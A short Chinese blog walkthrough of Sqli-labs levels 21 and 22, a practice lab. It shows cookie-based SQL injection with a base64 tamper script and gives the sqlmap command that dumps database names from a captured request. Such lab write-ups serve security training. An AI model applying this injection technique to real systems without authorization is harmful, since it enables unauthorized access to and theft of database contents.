Sqli-labs-Less-21、22

由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密

修改注入数据

选项:--tamper=base64encode

#自动化注入-SQLmap工具注入

 SQLmap用户手册:文档介绍 - sqlmap 用户手册

 由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包  用-r 选择目标txt文件

在Cookie 处加上*代表注入点

 21.

python sqlmap.py -r data.txt --tamper=base64encode --batch --dbs

爆出所有的数据库名

成功利用漏洞!!!

22.利用方式与21一样

python sqlmap.py -r data.txt --tamper=base64encode --batch --dbs

爆出所有的数据库名

成功利用漏洞!!!

好文阅读

评论可见,请评论后查看内容,谢谢!!!评论后请刷新页面。